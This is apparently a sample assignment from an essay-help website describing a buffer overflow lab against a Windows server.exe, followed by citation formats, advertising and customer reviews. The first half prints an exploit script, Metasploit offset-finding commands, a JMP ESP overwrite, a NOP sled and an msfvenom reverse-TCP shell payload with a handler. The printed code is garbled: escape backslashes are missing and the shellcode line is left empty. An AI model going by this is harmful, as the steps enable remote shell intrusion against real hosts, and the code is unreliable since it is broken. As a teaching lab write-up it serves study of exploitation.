The workshop is created for learning lesson on ethical hacking and defence using two virtual machines. In the workshop two machines are created in VmWare one is kali linux used for performing the attack and one is a windows client machine. In the network configuration both of the machines are configured to NAT such that the machines can communicate with the private and the public address and the Ip address is checked for each of the machine. Thus the preparation stage is completed.
In the finding and overflow stage immunity debugger is installed in the windows machine and a file server.exe is loaded in the immunity debugger and executed by pressing F9. In the kali linux a file is created with the name attack.py and the following codes given in the workshop is inputted in the file.
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# Testing
buffer = "x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
In the kali linux virtual machine the command ‘python attack.py IP_ADDRESS 1337’ is executed and in the IP address field the IP address of the victim machine is inputted. The windows environment is opened for passing the exception for its execution and the following screen appears with similar type of values. The value of the EIP and the EBP is changed to the values inputted by the attacker and the ESP point pointing to the different memory region contains the value injected from the attacker machine.
In the stage of weaponizing the vulnerability the immunity debugger installed in the victim machine is used for restarting the server.exe and starting its execution. In the kali virtual machine the Metasploit tool is used for performing an exploit on the network and it is done by running the following command.
“cd /usr/share/metasploit-framework/tools/exploit”, followed by
“./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337”.
Here also the IP address of the victim machine is inputted for performing the exploitation and identification of the vulnerability of the machine. The exception is passed on the victim machine and the resultant value of EIP is noted. The following command is used for the identification of the offset value for EIP:
“./pattern_offset.rb -l 5000 -q 37694136”
The result is noted and an address for the code is used for jumping to the ESP and the server.exe is restarted and the execution is started. After starting the execution the executable modules are viewed and searched for JMP ESP for finding the result of GDI32. The memory address is noted and the code of the attack.py is modified using the following command.
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "x41"*260
# Overwrite EIP with JMP ESP
buffer += "x78x16xF3x77"
# NOPSLED
buffer += "x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
A shell code is developed in Kali linux using the following command
“msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f python”
The attack.py file is modified for the inclusion of the shellcode generated form the above command.
For the exploitation the following command is used
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit"
The immunity debugger is closed and the server.exe is opened in the victim machine and on the linux the following command is executed
“python attack.py IP_ADDRESS 1337”
Li, C. (2015). Penetration testing curriculum development in practice. Journal of Information Technology Education: Innovations in Practice, 14(1), 85-99.
Rao, G. S., Kumar, P. N., Swetha, P., & BhanuKiran, G. (2014, December). Security assessment of computer networks-an ethical hacker's perspective. In Computer and Communications Technologies (ICCCT), 2014 International Conference on (pp. 1-5). IEEE.
Thomas, G., Burmeister, O. K., & Low, G. (2017). Issues of Implied Trust in Ethical Hacking. In Proceedings of The 28th Australasian Conference on Information Systems, December(pp. 4-6).
Yaghmaei, E., van de Poel, I., Christen, M., Gordijn, B., Kleine, N., Loi, M., ... & Weber, K. (2017). Canvas White Paper 1–Cybersecurity and Ethics.
To export a reference to this article please select a referencing stye below:
My Assignment Help. (2021). Ethical Hacking And Defence. Retrieved from https://myassignmenthelp.com/free-samples/csi3208-ethical-hacking-and-defence/network-configuration.html.
"Ethical Hacking And Defence." My Assignment Help, 2021, https://myassignmenthelp.com/free-samples/csi3208-ethical-hacking-and-defence/network-configuration.html.
My Assignment Help (2021) Ethical Hacking And Defence [Online]. Available from: https://myassignmenthelp.com/free-samples/csi3208-ethical-hacking-and-defence/network-configuration.html
[Accessed 21 April 2021].
My Assignment Help. 'Ethical Hacking And Defence' (My Assignment Help, 2021) <https://myassignmenthelp.com/free-samples/csi3208-ethical-hacking-and-defence/network-configuration.html> accessed 21 April 2021.
My Assignment Help. Ethical Hacking And Defence [Internet]. My Assignment Help. 2021 [cited 21 April 2021]. Available from: https://myassignmenthelp.com/free-samples/csi3208-ethical-hacking-and-defence/network-configuration.html.
Writing a personal statement for the University authorities is an essential part of getting into the UCAS application process. MyAssignmenthelp.com has expert writers who have specialized in writing personal statement essays for college students. With them by your aid, you will get through your dream college. For a glance about the basics of a good personal statement, you can check out the personal statement examples on our website too.
Answer: Routing is the process by which the best route is chosen among many routes in order to transmit data between the source and the destination. The choice of routes depend on the routing protocols that are implemented in any given network. The routing protocols utilizes different metrics in order to select the best routes to transmit data. This paper describes how RIP with IPv6 address can be improved in any given network topology in orde...
Read MoreAnswer: Operation Bluetooth is dependent on radio waves for transaction of the data. Bluetooth sends and receives the signal in bands. The bands that are prosecuted in between the projection of the management of signals includes 79 bands. All these 79 bands consists of different frequency. 2.4 GHz is the central band of frequency. 2.4GHz is set aside for medical purposes and is not used for regular day to day use. But the networking tha...
Read MoreAnswer Introduction This report has been focused on developing a change logger script created in Ubuntu OS and managing of regular activity of user utilizing this system. Therefore, for creating shell script if the system, it is extracted from different shell command and output has been stored in the HTML file. IT would help in monitoring the system in a proper manner. The pre-installed command line tools for utilizing creation of shell scrip...
Read MoreAnswer: Introduction The continued adoption and usage of technology has led to the rise and growth of information security concerns. Controlling access to digital resources have become a critical concern to any enterprise. As such, organizations have invested heavily in ensuring that their digital resources are safe and protected to ensure that no unauthorized access is allowed. Companies have employed different authentication strategies and...
Read MoreAnswer: This particle paper is all about reviewing literature on Internet of things. The paper highlights the importance of Internet of Things along with focusing on protocol, issues of application and technologies. IOT has encountered development in various fields like RFID, communication technologies and smart sensors. The main notion of technology is all about smart sensor t...
Read MoreJust share requirement and get customized Solution.
Orders
Overall Rating
Experts
Our writers make sure that all orders are submitted, prior to the deadline.
Using reliable plagiarism detection software, Turnitin.com.We only provide customized 100 percent original papers.
Feel free to contact our assignment writing services any time via phone, email or live chat. If you are unable to calculate word count online, ask our customer executives.
Our writers can provide you professional writing assistance on any subject at any level.
Our best price guarantee ensures that the features we offer cannot be matched by any of the competitors.
Get all your documents checked for plagiarism or duplicacy with us.
Get different kinds of essays typed in minutes with clicks.
Calculate your semester grades and cumulative GPa with our GPA Calculator.
Balance any chemical equation in minutes just by entering the formula.
Calculate the number of words and number of pages of all your academic documents.
Our Mission Client Satisfaction
Amazing support and great work from the expert! Again thank you guys so much for all the help!
Australia
well prepared project. got some minor editing and got the full marks. will use it again .
Australia
good job and consider the need the of the assignment .good job and consider the need the of the assignment .good job and consider the need the of the assignment .good job and consider the need the of the assignment .good job and consider the need the...
Australia
received 72 marks this is first assignment which i have received above 70 i have given so many assignment after this i received a good marks. but expected is 75 above as i had paid too much money.
Australia